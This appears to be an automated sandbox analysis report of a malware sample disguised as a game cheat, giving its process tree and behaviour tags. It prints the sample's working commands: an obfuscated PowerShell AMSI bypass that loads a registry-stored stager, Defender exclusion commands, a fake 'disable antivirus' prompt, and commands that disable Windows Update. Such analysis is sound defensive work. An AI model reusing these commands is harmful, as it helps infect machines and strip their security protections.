PID 1724 wrote to memory of 1520	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	88
PID 1724 wrote to memory of 1520	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	88
PID 1724 wrote to memory of 1520	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	88
PID 1724 wrote to memory of 4844	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	90
PID 1724 wrote to memory of 4844	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	90
PID 1724 wrote to memory of 4844	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	90
PID 408 wrote to memory of 2424	408	cmd.exe	95
PID 408 wrote to memory of 2424	408	cmd.exe	95
PID 408 wrote to memory of 2424	408	cmd.exe	95
PID 4004 wrote to memory of 3096	4004	cmd.exe	96
PID 4004 wrote to memory of 3096	4004	cmd.exe	96
PID 4004 wrote to memory of 3096	4004	cmd.exe	96
PID 1520 wrote to memory of 3192	1520	cmd.exe	97
PID 1520 wrote to memory of 3192	1520	cmd.exe	97
PID 1520 wrote to memory of 3192	1520	cmd.exe	97
PID 4844 wrote to memory of 5052	4844	cmd.exe	100
PID 4844 wrote to memory of 5052	4844	cmd.exe	100
PID 4844 wrote to memory of 5052	4844	cmd.exe	100
PID 5096 wrote to memory of 3520	5096	cmd.exe	98
PID 5096 wrote to memory of 3520	5096	cmd.exe	98
PID 412 wrote to memory of 2476	412	cmd.exe	101
PID 412 wrote to memory of 2476	412	cmd.exe	101
PID 5052 wrote to memory of 2272	5052	windowshost.exe	102
PID 5052 wrote to memory of 2272	5052	windowshost.exe	102
PID 5052 wrote to memory of 2272	5052	windowshost.exe	102
PID 2272 wrote to memory of 2420	2272	WScript.exe	204
PID 2272 wrote to memory of 2420	2272	WScript.exe	204
PID 2272 wrote to memory of 2420	2272	WScript.exe	204
PID 2420 wrote to memory of 1552	2420	cmd.exe	107
PID 2420 wrote to memory of 1552	2420	cmd.exe	107
PID 408 wrote to memory of 3632	408	cmd.exe	108
PID 408 wrote to memory of 3632	408	cmd.exe	108
PID 408 wrote to memory of 3632	408	cmd.exe	108
PID 2476 wrote to memory of 4504	2476	svchost.exe	111
PID 2476 wrote to memory of 4504	2476	svchost.exe	111
PID 3520 wrote to memory of 1124	3520	svchost.exe	112
PID 3520 wrote to memory of 1124	3520	svchost.exe	112
PID 2476 wrote to memory of 4504	2476	svchost.exe	111
PID 3520 wrote to memory of 1124	3520	svchost.exe	112
PID 4504 wrote to memory of 1048	4504	conhost.exe	113
PID 4504 wrote to memory of 1048	4504	conhost.exe	113
PID 1124 wrote to memory of 1924	1124	conhost.exe	115
PID 1124 wrote to memory of 1924	1124	conhost.exe	115
PID 1048 wrote to memory of 3196	1048	cmd.exe	117
PID 1048 wrote to memory of 3196	1048	cmd.exe	117
PID 1924 wrote to memory of 4348	1924	cmd.exe	118
PID 1924 wrote to memory of 4348	1924	cmd.exe	118
PID 1124 wrote to memory of 2024	1124	conhost.exe	119
PID 1124 wrote to memory of 2024	1124	conhost.exe	119
PID 1124 wrote to memory of 4112	1124	conhost.exe	189
PID 1124 wrote to memory of 4112	1124	conhost.exe	189
PID 1124 wrote to memory of 4244	1124	conhost.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:376
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fda5b80c-880d-4e16-83eb-6e5ccd7a5c51}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3456

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1148
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2852
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:hvSfigTmeaHL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kXALeXrVmRCDVC,[Parameter(Position=1)][Type]$mjCvObTjzf)$zzLWvnrzJZC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$zzLWvnrzJZC.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$kXALeXrVmRCDVC).SetImplementationFlags('Runtime,Managed');$zzLWvnrzJZC.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$mjCvObTjzf,$kXALeXrVmRCDVC).SetImplementationFlags('Runtime,Managed');Write-Output $zzLWvnrzJZC.CreateType();}$KDlbZxhOmPPiD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$mHHlEiVprbRnIC=$KDlbZxhOmPPiD.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IgBljpOHtRecOkjrGlI=hvSfigTmeaHL @([String])([IntPtr]);$dLtIyehCwBylUTZNNnswqo=hvSfigTmeaHL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dEvdgsIrjXF=$KDlbZxhOmPPiD.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$BjhnSujRCGipiP=$mHHlEiVprbRnIC.Invoke($Null,@([Object]$dEvdgsIrjXF,[Object]('Load'+'LibraryA')));$ErYATvABDLCwlrWOr=$mHHlEiVprbRnIC.Invoke($Null,@([Object]$dEvdgsIrjXF,[Object]('Vir'+'tual'+'Pro'+'tect')));$KXkMHVd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BjhnSujRCGipiP,$IgBljpOHtRecOkjrGlI).Invoke('a'+'m'+'si.dll');$tXcEmPHBrgVhgfOvN=$mHHlEiVprbRnIC.Invoke($Null,@([Object]$KXkMHVd,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VFtpUYGoqs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErYATvABDLCwlrWOr,$dLtIyehCwBylUTZNNnswqo).Invoke($tXcEmPHBrgVhgfOvN,[uint32]8,4,[ref]$VFtpUYGoqs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$tXcEmPHBrgVhgfOvN,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ErYATvABDLCwlrWOr,$dLtIyehCwBylUTZNNnswqo).Invoke($tXcEmPHBrgVhgfOvN,[uint32]8,0x20,[ref]$VFtpUYGoqs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:636
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LOTYxzbBXRAp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uBUfzUFJhfzXXS,[Parameter(Position=1)][Type]$XVFqYvQoiC)$ibRXgZBcYQU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$ibRXgZBcYQU.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$uBUfzUFJhfzXXS).SetImplementationFlags('Runtime,Managed');$ibRXgZBcYQU.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$XVFqYvQoiC,$uBUfzUFJhfzXXS).SetImplementationFlags('Runtime,Managed');Write-Output $ibRXgZBcYQU.CreateType();}$azyjLyJAMYMif=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$UmLprUOebGHKpv=$azyjLyJAMYMif.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aKbaXwUUeqtKBCZyhQX=LOTYxzbBXRAp @([String])([IntPtr]);$UgAXXZamepAwxgXKeuFnOH=LOTYxzbBXRAp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PiCGrsnFlzs=$azyjLyJAMYMif.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$oZdviCkujCogdx=$UmLprUOebGHKpv.Invoke($Null,@([Object]$PiCGrsnFlzs,[Object]('Load'+'LibraryA')));$qifjTwktvOwymVpuC=$UmLprUOebGHKpv.Invoke($Null,@([Object]$PiCGrsnFlzs,[Object]('Vir'+'tual'+'Pro'+'tect')));$QQgVWGU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oZdviCkujCogdx,$aKbaXwUUeqtKBCZyhQX).Invoke('a'+'m'+'si.dll');$GIhvsfeMDBylSPgkX=$UmLprUOebGHKpv.Invoke($Null,@([Object]$QQgVWGU,[Object]('Ams'+'iSc'+'an'+'Buffer')));$dfMBYWrvGV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qifjTwktvOwymVpuC,$UgAXXZamepAwxgXKeuFnOH).Invoke($GIhvsfeMDBylSPgkX,[uint32]8,4,[ref]$dfMBYWrvGV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GIhvsfeMDBylSPgkX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qifjTwktvOwymVpuC,$UgAXXZamepAwxgXKeuFnOH).Invoke($GIhvsfeMDBylSPgkX,[uint32]8,0x20,[ref]$dfMBYWrvGV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1444
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1200

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1932

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2904

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3352

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3392
- C:\Users\Admin\AppData\Local\Temp\ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe
  "C:\Users\Admin\AppData\Local\Temp\ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3096
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2424
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:412
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      C:\Users\Admin\AppData\Local\Temp\svchost.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2476
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4504
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:1940
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:768
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:2520
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:3280
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:3744
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:5060
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:4344
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4556
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        7⤵
        Launches sc.exe
        
        PID:3208
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:548
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:1520
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4184
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:408
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4608
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:4512
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4424
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1700
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1956
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        7⤵
        
        PID:2940
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        7⤵
        
        PID:3364
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        
        PID:3096
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        
        PID:1848
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        
        PID:1856
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        
        PID:804
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        7⤵
        
        PID:1812
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        7⤵
        
        PID:4876
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        7⤵
        
        PID:4392
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        7⤵
        
        PID:1344
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        7⤵
        
        PID:956
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        7⤵
        
        PID:4160
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        7⤵
        
        PID:952
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3468
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1344
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
